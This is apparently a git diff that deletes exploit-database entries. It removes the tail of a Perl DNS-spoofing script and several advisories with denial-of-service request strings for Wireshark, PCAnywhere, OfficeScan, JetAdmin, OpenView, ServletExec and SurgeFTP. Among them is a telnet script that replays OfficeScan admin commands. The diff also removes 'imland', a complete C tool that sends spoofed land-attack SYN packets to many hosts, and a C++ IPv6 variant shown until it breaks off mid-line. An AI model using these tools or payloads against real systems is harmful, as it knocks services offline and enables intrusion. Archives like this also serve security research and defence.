-"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03". -"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79". -"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00". -"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62". -"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f". -"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03". -"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69". -"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e". -"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01". -"\x00\x01\x00\x00\x00\x01\x00\x01\x41"; -while ($sock->recv($newmsg, $MAXLEN)) { - my($port, $ipaddr) = sockaddr_in($sock->peername); - $hishost = gethostbyaddr($ipaddr, AF_INET); - print "Client $hishost said ``$newmsg''\n"; - $sock->send($oldmsg); - $oldmsg = "[$hishost] $newmsg"; -} -die "recv: $!"; diff --git a/platforms/linux/remote/35432.txt b/platforms/linux/remote/35432.txt deleted file mode 100755 index 86586d961..000000000 --- a/platforms/linux/remote/35432.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/46796/info - -Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference error. - -An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35432.pcap \ No newline at end of file diff --git a/platforms/multiple/local/10327.txt b/platforms/multiple/local/10327.txt deleted file mode 100755 index 91c3049bc..000000000 --- a/platforms/multiple/local/10327.txt +++ /dev/null @@ -1,150 +0,0 @@ -Ghostscript is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied input. - -Exploiting this issue allows remote attackers to crash the application and possibly to execute code, but this has not been confirmed. - - -Vulnerable: Ubuntu Ubuntu Linux 8.10 sparc -Ubuntu Ubuntu Linux 8.10 powerpc -Ubuntu Ubuntu Linux 8.10 lpia -Ubuntu Ubuntu Linux 8.10 i386 -Ubuntu Ubuntu Linux 8.10 amd64 -Ubuntu Ubuntu Linux 8.04 LTS sparc -Ubuntu Ubuntu Linux 8.04 LTS powerpc -Ubuntu Ubuntu Linux 8.04 LTS lpia -Ubuntu Ubuntu Linux 8.04 LTS i386 -Ubuntu Ubuntu Linux 8.04 LTS amd64 -Ubuntu Ubuntu Linux 6.06 LTS sparc -Ubuntu Ubuntu Linux 6.06 LTS powerpc -Ubuntu Ubuntu Linux 6.06 LTS i386 -Ubuntu Ubuntu Linux 6.06 LTS amd64 -Sun Solaris 9_x86 -Sun Solaris 9 -Sun Solaris 10_x86 -Sun Solaris 10 -Sun OpenSolaris build snv_99 -Sun OpenSolaris build snv_96 -Sun OpenSolaris build snv_95 -Sun OpenSolaris build snv_94 -Sun OpenSolaris build snv_93 -Sun OpenSolaris build snv_92 -Sun OpenSolaris build snv_91 -Sun OpenSolaris build snv_90 -Sun OpenSolaris build snv_89 -Sun OpenSolaris build snv_88 -Sun OpenSolaris build snv_87 -Sun OpenSolaris build snv_86 -Sun OpenSolaris build snv_85 -Sun OpenSolaris build snv_84 -Sun OpenSolaris build snv_83 -Sun OpenSolaris build snv_82 -Sun OpenSolaris build snv_81 -Sun OpenSolaris build snv_80 -Sun OpenSolaris build snv_78 -Sun OpenSolaris build snv_77 -Sun OpenSolaris build snv_76 -Sun OpenSolaris build snv_68 -Sun OpenSolaris build snv_67 -Sun OpenSolaris build snv_64 -Sun OpenSolaris build snv_61 -Sun OpenSolaris build snv_59 -Sun OpenSolaris build snv_57 -Sun OpenSolaris build snv_54 -Sun OpenSolaris build snv_50 -Sun OpenSolaris build snv_47 -Sun OpenSolaris build snv_45 -Sun OpenSolaris build snv_39 -Sun OpenSolaris build snv_36 -Sun OpenSolaris build snv_29 -Sun OpenSolaris build snv_22 -Sun OpenSolaris build snv_19 -Sun OpenSolaris build snv_13 -Sun OpenSolaris build snv_114 -Sun OpenSolaris build snv_113 -Sun OpenSolaris build snv_112 -Sun OpenSolaris build snv_111a -Sun OpenSolaris build snv_111 -Sun OpenSolaris build snv_110 -Sun OpenSolaris build snv_109 -Sun OpenSolaris build snv_108 -Sun OpenSolaris build snv_107 -Sun OpenSolaris build snv_106 -Sun OpenSolaris build snv_105 -Sun OpenSolaris build snv_104 -Sun OpenSolaris build snv_103 -Sun OpenSolaris build snv_102 -Sun OpenSolaris build snv_101a -Sun OpenSolaris build snv_101 -Sun OpenSolaris build snv_100 -Sun OpenSolaris build snv_02 -Sun OpenSolaris build snv_01 -S.u.S.E. SUSE Linux Enterprise Server 9 -S.u.S.E. SLE 11 -S.u.S.E. SLE 10 -S.u.S.E. openSUSE 11.1 -S.u.S.E. openSUSE 11.0 -S.u.S.E. openSUSE 10.3 -S.u.S.E. Open-Enterprise-Server 0 -S.u.S.E. Novell Linux Desktop 9 -rPath rPath Linux 2 -RedHat Fedora 9 0 -RedHat Fedora 8 0 -RedHat Enterprise Linux WS 4 -RedHat Enterprise Linux WS 3 -RedHat Enterprise Linux WS 2.1 IA64 -RedHat Enterprise Linux WS 2.1 -RedHat Enterprise Linux ES 4 -RedHat Enterprise Linux ES 3 -RedHat Enterprise Linux ES 2.1 IA64 -RedHat Enterprise Linux ES 2.1 -RedHat Enterprise Linux Desktop Workstation 5 client -RedHat Enterprise Linux Desktop 5 client -RedHat Enterprise Linux AS 4 -RedHat Enterprise Linux AS 3 -RedHat Enterprise Linux AS 2.1 IA64 -RedHat Enterprise Linux AS 2.1 -RedHat Enterprise Linux Desktop version 4 -RedHat Enterprise Linux 5 server -RedHat Desktop 3.0 -Pardus Linux 2008 0 -MandrakeSoft Linux Mandrake 2009.0 x86_64 -MandrakeSoft Linux Mandrake 2009.0 -MandrakeSoft Linux Mandrake 2008.1 x86_64 -MandrakeSoft Linux Mandrake 2008.1 -MandrakeSoft Linux Mandrake 2008.0 x86_64 -MandrakeSoft Linux Mandrake 2008.0 -MandrakeSoft Corporate Server 4.0 x86_64 -MandrakeSoft Corporate Server 3.0 x86_64 -MandrakeSoft Corporate Server 3.0 -MandrakeSoft Corporate Server 4.0 -Ghostscript Ghostscript 8.15.2 -Ghostscript Ghostscript 8.0.1 -Ghostscript Ghostscript 8.61 -Ghostscript Ghostscript 8.60 -Ghostscript Ghostscript 8.57 -Ghostscript Ghostscript 8.56 -Ghostscript Ghostscript 8.54 -Ghostscript Ghostscript 8.15 -Avaya Proactive Contact 3.0.2 -Avaya Proactive Contact 4.1 -Avaya Proactive Contact 4.0 -Avaya Proactive Contact 3.0 -Avaya Proactive Contact 0 -Avaya Messaging Storage Server MSS 3.0 -Avaya Messaging Storage Server MM3.0 -Avaya Messaging Storage Server 5.0 -Avaya Messaging Storage Server 4.0 -Avaya Messaging Storage Server 3.1 -Avaya Messaging Storage Server 2.0 -Avaya Messaging Storage Server 1.0 -Avaya Messaging Storage Server -Avaya Message Networking MN 3.1 -Avaya Message Networking 3.1 -Avaya Message Networking -Avaya Intuity AUDIX LX 2.0 SP2 -Avaya Intuity AUDIX LX 2.0 SP1 -Avaya Intuity AUDIX LX 2.0 -Avaya Intuity AUDIX LX 1.0 -Avaya Intuity AUDIX - -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf) - diff --git a/platforms/multiple/remote/19212.txt b/platforms/multiple/remote/19212.txt deleted file mode 100755 index e12838843..000000000 --- a/platforms/multiple/remote/19212.txt +++ /dev/null @@ -1,10 +0,0 @@ -source: http://www.securityfocus.com/bid/267/info - -A set of vulnerabilities in the counter.exe web hit counter program enables denial of service attacks. - -A malicious user can create a malformed like ",1" entry in the counter.log file by requesting a URL of the form "http://www.example.com/scripts/counter.exe?%0A". Any further attempt for request will result in an Access Violation in counter.exe. - -A similar vulnerability exists if a user requests a URL of the form "http://www.example.com/scripts/counter.exe?AAAAA" with over 2200 A's. - -All further requests for counter.exe are queued and are not processed until the error messages are cleared at the console. System memory may be decremented each time a request for counter.exe is queued. - diff --git a/platforms/multiple/remote/19230.txt b/platforms/multiple/remote/19230.txt deleted file mode 100755 index 5612df231..000000000 --- a/platforms/multiple/remote/19230.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/288/info - -Servers running PCAnywhere32 with TCP/IP networking are subject to a Denial of Service attack that will hang the server at 100% CPU utilization. A malicious user may initiate this DoS by connecting to tcp port 5631 on the PCAnywhere server input a large amount of data when prompted with "Please press ". - -Connect to tcp 5631. At the Please press prompt, transfer a large amount of data to the PCAnywhere server. This will peg the CPU utilization at 100%. \ No newline at end of file diff --git a/platforms/multiple/remote/19780.txt b/platforms/multiple/remote/19780.txt deleted file mode 100755 index 1d8cfb475..000000000 --- a/platforms/multiple/remote/19780.txt +++ /dev/null @@ -1,49 +0,0 @@ -source: http://www.securityfocus.com/bid/1013/info - -Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager. - -There are several ways for an attacker to cause various denial of service conditions. - -Sending random data to port 12345 can cause tmlisten.exe to either consume 100% of the CPU cycles or cause a Visual C++ error and crash the machine. - -Furthermore, opening over 5 simultaneous connections to port 12345 while sending random data will cause the service to stop responding to requests. The service will have to be stopped and restarted on each client machine. - -It has also been reported that it is possible to cause a denial of service condition by making a single malformed GET request to port 12345. - -It is also possible for a local user to capture an administrative command by using a network sniffer. This command can then be modified and replayed against other clients to cause them to perform a variety of actions. Modifying the last two bytes of the request will change the client's response behaviour, including: - -04: full uninstallation of the OfficeScan client -06: launch a scan -07: stop a scan - -The client makes requests to a few CGI programs on the server, which respond with configuration information. One of these CGIs is cgiRqCfg.exe, which provides configuration details for scan behaviour. - -If an attacker were to set up a webserver with the same IP address as the valid server, duplicate the valid server's OfficeScan file structure, and disable the valid server, it would be possible to perform a more subtle DoS by leaving the client installed but modifying the config files to restrict the file types scanned, (for example: setting the client to only scan .txt files) or to restrict the types of drives scanned (for example: disabling scanning on removable, fixed, and CD-ROM drives). It is also possible to cause the client to move any infected files to any location on the local machine. - -It should also be noted that some intrusion detection systems may detect attacks against port 12345 as Back Orifice attempts, which has the potential to conceal the nature of these attacks. - -cgiRqCfg.exe provides to the client configuration settings which will disable scanning on all removable, fixed, and CDrom drives, and further will disable scanning for all files except those with the extension "YES IT's P0SS1bl3!" - -cgiOnStart.exe will need to be put on the attacking webserver as the client expects it. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-1.exe - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-2.exe - -this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response. - -#!/bin/sh -( -sleep 2 -echo "GET/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906HTTP/1.0" -echo "Host: "$1":12345" -echo "User-Agent: OfficeScan/3.5" -echo "Accept: */*" -echo -echo -sleep 5 -)| telnet $1 12345 2>&1 | tee -a ./log.txt - -Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef . This tool is a pre-compiled Windows binary with Visual Basic source. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-3.zip \ No newline at end of file diff --git a/platforms/multiple/remote/19965.txt b/platforms/multiple/remote/19965.txt deleted file mode 100755 index bd09f02a5..000000000 --- a/platforms/multiple/remote/19965.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/1246/info - -By default JetAdmin Web Interface Server listens on port 8000. If a malformed URL request is sent to port 8000 this will cause the server services to stop responding. The service must be stopped and restarted to regain normal functionality. - -http://target:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$ \ No newline at end of file diff --git a/platforms/multiple/remote/20239.txt b/platforms/multiple/remote/20239.txt deleted file mode 100755 index fc2dc8522..000000000 --- a/platforms/multiple/remote/20239.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/1713/info - -The OverView5 CGI interface by default is shipped with HP Openview Node Manager. - -HP Openview Node Manager can be compromised due to an unchecked buffer. By sending a specially crafted GET request comprised of 136 bytes to the web services (default port 80) through the Overview5 CGI interface, the SNMP service will crash. - -Successful exploitation, depending on the data entered, will allow the execution of arbitrary code. - -http://target/OvCgi/OpenView5.exe?Context=Snmp&Action=Snmp&Host=&Oid= \ No newline at end of file diff --git a/platforms/multiple/remote/20336.txt b/platforms/multiple/remote/20336.txt deleted file mode 100755 index a77abf3da..000000000 --- a/platforms/multiple/remote/20336.txt +++ /dev/null @@ -1,12 +0,0 @@ -source: http://www.securityfocus.com/bid/1868/info - -Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. - -eWave ServletExec is susceptible to a denial of service attack if a URL invoking the ServletExec servlet preceded by /servlet is requested. The ServletExec engine will attempt to bind a server thread over port 80 and if the web server is currently running, a java.net.BindException error will result thus halting all operations on the ServletExec engine. The web server is not affected by this vulnerability. Restarting the application is required in order to regain normal functionality. - -http://target/servlet/ServletExec - -or - -nc 10.0.0.1 80 -GET /servlet/ServletExec HTTP/1.0 \ No newline at end of file diff --git a/platforms/multiple/remote/20659.txt b/platforms/multiple/remote/20659.txt deleted file mode 100755 index d93353334..000000000 --- a/platforms/multiple/remote/20659.txt +++ /dev/null @@ -1,24 +0,0 @@ -source: http://www.securityfocus.com/bid/2442/info - -SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms. - -A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating. - -Therefore, it is possible for a malicious user to deny service to legitimate users by passing the predescribed request to the ftp server. - -# ftp localhost -Connected to testbak -220 SurgeFTP testbak (Version 1.0b) -User (testbak:(none)): anonymous -331 Password required for anonymous. -Password: -230- Alias Real path Access -230- / /home read -230 User anonymous logged in. -200 Port command successful. -150 Opening ASCII mode data connection for file list. (/) -226 Transfer complete. -ftp> ls .. -200 Port command successful. -550 Opening ASCII mode data connection for file list. (/..) --> ftp get:Connection reset by peer \ No newline at end of file diff --git a/platforms/multiple/remote/20810.c b/platforms/multiple/remote/20810.c deleted file mode 100755 index c95b6c811..000000000 --- a/platforms/multiple/remote/20810.c +++ /dev/null @@ -1,381 +0,0 @@ -source: http://www.securityfocus.com/bid/2666/info - -A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. - -It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. - -**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. - -/* - * imland - improved multiple land - * - * A good spanking session requires several good, hard slaps. - * - * This program lands multiple land attacks on multiple hosts as a - * proof of concept of the oldly discovered but newly resurfaced - * M$ `land' attack vulnerability. It was written without ill intent to - * test a large range of servers for vulnerabilities in one go. - * - * If the targeted machines freeze up for 5-30 seconds for each packet, - * that means they are vulnerable. - * - * Disclaimer: - * This program was written without ill intent. It was designed to test - * and prove the effects of the LAND attack on multiple hosts at once. - * I am in no way responsible for what you do with this piece of code. - * - * Please use it responsibly to test your own servers only. - * - */ - -#define _BSD_SOURCE -#define __FAVOR_BSD - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -/* the attack packet */ -struct raw_tcp_packet { - struct ip ip; - struct tcphdr tcp; -}; - -/* required to make the TCP checksum correct */ -struct tcp_chksum_hdr { - struct in_addr src; - struct in_addr dest; - u_char zero; - u_char proto; - u_short len; - struct tcphdr tcp; -}; - -/* linked list with all we need, really */ -typedef struct target { - struct sockaddr_in sa; - struct { - struct iphdr ip; /* included here so we can build them once */ - struct tcphdr tcp; /* and thus transmit a tiny bit faster */ - } pkt; - struct target *next; -} target; - -/** prototypes **/ -int send_land(int, struct target *); -void u_sleep(u_int); -int add_target_ip(char *, struct in_addr *, u_short); -u_int get_timevar(const char *); -int add_target(char *); -unsigned short chksum(unsigned short *, int); -void finish(int); -void crash(const char *, ...); -void usage(void); - -/** external **/ -extern int optind, opterr, optopt; -extern int h_errno; -extern char *optarg; -extern char *__progname; - -/** global variables **/ -target *list = NULL, *cursor = NULL; -int targets = 0; -int pkt_interval = 0; /* no delay by default */ -int pkts = 1, pkts_sent = 0; /* send one per host by default */ -int debug = 0; -u_short defport = 139; /* default port */ - -/** code start **/ -void crash(const char *fmt, ...) -{ - va_list ap; - - printf("%s: ", __progname); - - va_start(ap, fmt); - vprintf(fmt, ap); - va_end(ap); - - if(errno) printf(": %s", strerror(errno)); - puts(""); - - exit(3); -} - -int main(int argc, char **argv) -{ - target *host; - int sock, foo; - - if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) - crash("socket()"); - - while((foo = getopt(argc, argv, "v:i:p:n:")) != EOF) { - switch(foo) { - case 'v': - debug++; - break; - case 'i': - pkt_interval = get_timevar(optarg); - break; - case 'p': - defport = (u_short)strtoul(optarg, NULL, 0); - break; - case 'n': - pkts = strtoul(optarg, NULL, 0); - if(debug) printf("Sending %d packets\n", pkts); - break; - default: - add_target(optarg); - break; - } - } - - argv = &argv[optind]; - while(*argv) { - add_target(*argv); - argv++; - } - - if(!targets) usage(); - - while(!pkts || pkts > pkts_sent) { - host = list; - while(host) { - printf("Sending to %s:%u ... ", - inet_ntoa(host->sa.sin_addr), - host->sa.sin_port); - foo = send_land(sock, host); - if(foo == - 1) printf("failed - %s\n", strerror(errno)); - else printf("ok, landed %d bytes\n", foo); - - if(pkt_interval) u_sleep(pkt_interval); - - host = host->next; - } - pkts_sent++; - } - - return 0; -} - -/* build and send the land attack packet */ -int send_land(int sock, struct target *host) -{ - struct raw_tcp_packet pkt; - struct tcp_chksum_hdr tcc; - - memset(&pkt, 0, sizeof(pkt)); - memset(&tcc, 0, sizeof(tcc)); - - /* ip options */ - pkt.ip.ip_v = IPVERSION; - pkt.ip.ip_hl = sizeof(struct iphdr) / 4; - pkt.ip.ip_tos = 0; - pkt.ip.ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); - pkt.ip.ip_off = htons(IP_DF); - pkt.ip.ip_ttl = 0xff; - pkt.ip.ip_p = IPPROTO_TCP; - pkt.ip.ip_src = pkt.ip.ip_dst = host->sa.sin_addr; - pkt.ip.ip_sum = chksum((u_short *)&pkt.ip, sizeof(struct iphdr)); - - tcc.src = tcc.dest = host->sa.sin_addr; - tcc.zero = 0; - tcc.proto = IPPROTO_TCP; - tcc.len = htons(sizeof(struct tcphdr)); - - tcc.tcp.th_sport = tcc.tcp.th_dport = htons(host->sa.sin_port); - tcc.tcp.th_seq = htons(0x1d1); - tcc.tcp.th_off = sizeof(struct ip) / 4; - tcc.tcp.th_flags = TH_SYN; - tcc.tcp.th_win = htons(512); - - memcpy(&pkt.tcp, &tcc.tcp, sizeof(struct tcphdr)); - pkt.tcp.th_sum = chksum((u_short *)&tcc, sizeof(tcc)); - return sendto(sock, &pkt, sizeof(pkt), 0, (struct sockaddr *)&host->sa, - sizeof(struct sockaddr_in)); -} - -/* calculate checksum */ -u_short chksum(u_short *p, int n) -{ - register long sum = 0; - - while(n > 1) { - sum += *p++; - n -= 2; - } - /* mop up the occasional odd byte */ - if(n == 1) sum += *(u_char *)p; - - sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ - sum = sum + (sum >> 16); /* add carry */ - return ~sum; /* ones-complement, truncate */ -} - -/* usleep() the portable way. No error checking is done, - * so this might theoretically fail. */ -void u_sleep(u_int u_sec) -{ - struct timeval to; - fd_set readset, writeset; - - if(debug > 3) printf("sleeping for %u microseconds\n", u_sec); - if(!u_sec) return; - - to.tv_sec = u_sec / 1000000; - to.tv_usec = u_sec % 1000000; - FD_ZERO(&writeset); - FD_ZERO(&readset); - select(0, &readset, &writeset, NULL, &to); - - return; -} - -int add_target_ip(char *arg, struct in_addr *in, u_short port) -{ - struct target *host; - - /* disregard obviously stupid addresses */ - if(in->s_addr == INADDR_NONE || in->s_addr == INADDR_ANY) - return -1; - - if(debug) printf("Adding %s:%u to target list\n", inet_ntoa(*in), port); - - /* add the fresh ip */ - host = malloc(sizeof(struct target)); - if(!host) { - crash("add_target_ip(%s, %s): malloc(%d) failed", - arg, inet_ntoa(*in), sizeof(struct target)); - } - memset(host, 0, sizeof(struct target)); - - /* fill out the sockaddr_in struct */ - host->sa.sin_family = AF_INET; - host->sa.sin_addr.s_addr = in->s_addr; - host->sa.sin_port = port ? port : defport; - - if(!list) list = host; - else cursor->next = host; - - cursor = host; - targets++; - - return 0; -} - -/* wrapper for add_target_ip to resolve stuff as well */ -int add_target(char *arg) -{ - int i; - struct hostent *he; - struct in_addr *in, ip; - char *port_str; - u_short port = 0; - - if(!arg) return -1; - - if((port_str = strchr(arg, ':'))) { - *port_str = '\0'; - port_str++; - if(*port_str) port = (u_short)strtoul(port_str, NULL, 0); - } - - /* don't resolve if we don't have to */ - if(inet_aton(arg, &ip)) return add_target_ip(arg, &ip, port); - - /* not an IP, so resolve */ - errno = 0; - he = gethostbyname(arg); - if(!he && h_errno == TRY_AGAIN) { - u_sleep(500000); - he = gethostbyname(arg); - } - - if(!he) crash("Failed to resolve %s: %s", arg, hstrerror(h_errno)); - - /* add all the IP's as targets */ - for(i = 0; he->h_addr_list[i]; i++) { - in = (struct in_addr *)he->h_addr_list[i]; - add_target_ip(arg, in, port); - } - - return 0; -} - -/* - * u = micro - * m = milli - * s = seconds - * return value is in microseconds - */ -u_int get_timevar(const char *str) -{ - char p, u, *ptr; - unsigned int len; - u_int i, d; /* integer and decimal, respectively */ - u_int factor = 1000; /* default to milliseconds */ - - if(!str) return 0; - len = strlen(str); - if(!len) return 0; - - /* unit might be given as ms|m (millisec), - * us|u (microsec) or just plain s, for seconds */ - u = p = '\0'; - u = str[len - 1]; - if(len >= 2 && !isdigit((int)str[len - 2])) p = str[len - 2]; - if(p && u == 's') u = p; - else if(!p) p = u; - if(debug > 3) printf("evaluating %s, u: %c, p: %c\n", str, u, p); - - if(u == 'u') factor = 1; /* microseconds */ - else if(u == 'm') factor = 1000; /* milliseconds */ - else if(u == 's') factor = 1000000; /* seconds */ - if(debug > 3) printf("factor is %u\n", factor); - - i = strtoul(str, &ptr, 0); - if(!ptr || *ptr != '.' || strlen(ptr) < 2 || factor == 1) - return i * factor; - - /* time specified in usecs can't have decimal points, so ignore them */ - if(factor == 1) return i; - - d = strtoul(ptr + 1, NULL, 0); - - /* d is decimal, so get rid of excess baggage */ - while(d >= factor) d /= 10; - - /* the last parenthesis avoids floating point exceptions. */ - return ((i * factor) + (d * (factor / 10))); -} - -void usage(void) -{ - printf("Usage: %s -i -p -n host1:port1 hostn:portn\n\n", - __progname); - - printf("-i sets packet interval in milliseconds.\n"); - printf(" You can specify Nus for N microseconds, or Ns for N seconds.\n"); - printf(" Default is 0, which is good for multiple hosts and one packet.\n"); - printf(" If you want to send continuously, specify 1s or more, so as to not\n"); - printf(" cause DoS due to sheer traffic volume.\n\n"); - printf("-p sets the DEFAULT port (139 if not specified)\n\n"); - printf("-n determines how many packets to send to each target. Default is 1\n\n"); - printf("host:port combinations can be given as such; 207.46.130.108:80\n"); - printf("The port part of a target definition ovverrides the defaults.\n\n"); - printf("Hostnames will be resolved, if possible.\n"); - - exit(1); -} diff --git a/platforms/multiple/remote/20811.cpp b/platforms/multiple/remote/20811.cpp deleted file mode 100755 index 1096814bb..000000000 --- a/platforms/multiple/remote/20811.cpp +++ /dev/null @@ -1,247 +0,0 @@ -source: http://www.securityfocus.com/bid/2666/info - -A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. - -It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. - -**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. - -// -// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135 -// -// Written by: Konrad Malewski. -// - -#include -#include -#include -#include -#include -#include -/////////////////////////////////////////////////////////////////////////////// -///////////// from libnet ///////////// -/* ethernet addresses are 6 octets long */ -#define ETHER_ADDR_LEN 0x6 - -typedef unsigned char u_int8_t; -typedef unsigned short u_int16_t; -typedef unsigned int u_int32_t; -typedef unsigned __int64 u_int64_t; -/* -* Ethernet II header -* Static header size: 14 bytes -*/ -struct libnet_ethernet_hdr -{ - u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */ - u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */ - u_int16_t ether_type; /* protocol */ -}; - -struct libnet_in6_addr -{ - union - { - u_int8_t __u6_addr8[16]; - u_int16_t __u6_addr16[8]; - u_int32_t __u6_addr32[4]; - } __u6_addr; /* 128-bit IP6 address */ -}; - - -/* -* IPv6 header -* Internet Protocol, version 6 -* Static header size: 40 bytes -*/ -struct libnet_ipv6_hdr -{ - u_int8_t ip_flags[4]; /* version, traffic class, flow label */ - u_int16_t ip_len; /* total length */ - u_int8_t ip_nh; /* next header */ - u_int8_t ip_hl; /* hop limit */ - struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */ - -}; - -/* -* TCP header -* Transmission Control Protocol -* Static header size: 20 bytes -*/ -struct libnet_tcp_hdr -{ - u_int16_t th_sport; /* source port */ - u_int16_t th_dport; /* destination port */ - u_int32_t th_seq; /* sequence number */ - u_int32_t th_ack; /* acknowledgement number */ - u_int8_t th_x2:4, /* (unused) */ -th_off:4; /* data offset */ - - u_int8_t th_flags; /* control flags */ - u_int16_t th_win; /* window */ - u_int16_t th_sum; /* checksum */ - u_int16_t th_urp; /* urgent pointer */ -}; - -int libnet_in_cksum(u_int16_t *addr, int len) -{ - int sum; - union - { - u_int16_t s; - u_int8_t b[2]; - }pad; - sum = 0; - while (len > 1) - { - sum += *addr++; - len -= 2; - } - if (len == 1) - { - pad.b[0] = *(u_int8_t *)addr; - pad.b[1] = 0; - sum += pad.s; - } - return (sum); -} -#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff)) - -/////////////////////////////////////////////////////////////////////////////// -/////////////////////////////////////////////////////////////////////////////// -u_char packet[74]; -struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14); -struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54); -struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet; - -u_char errbuf[1024]; -pcap_t *pcap_handle; - - -void usage(char* n) -{ - pcap_if_t * alldevs,*d; - int i=1; - fprintf(stdout,"Usage:\n" - "\t %s \n",n); - - if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1) - { - fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf); - exit(EXIT_FAILURE); - } - printf("Avaliable adapters: \n"); - d = alldevs; - while (d!=NULL) - { - printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description); - d = d->next; - } - pcap_freealldevs (alldevs); -} -/////////////////////////////////////////////////////////////////////////////// -int main(int argc, char* argv[]) -{ - if ( argc<4 ) - { - usage(argv[0]); - return EXIT_FAILURE; - } - - int retVal; - struct addrinfo hints,*addrinfo; - - ZeroMemory(&hints,sizeof(hints)); - - WSADATA wsaData; - if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR ) - { - fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError()); - return EXIT_FAILURE; - } - // - // Get MAC address of remote host (assume link local IpV6 address) - // - - hints.ai_family = PF_INET6; - hints.ai_socktype = SOCK_STREAM; - hints.ai_protocol = IPPROTO_TCP; - hints.ai_flags = AI_PASSIVE; - - retVal = 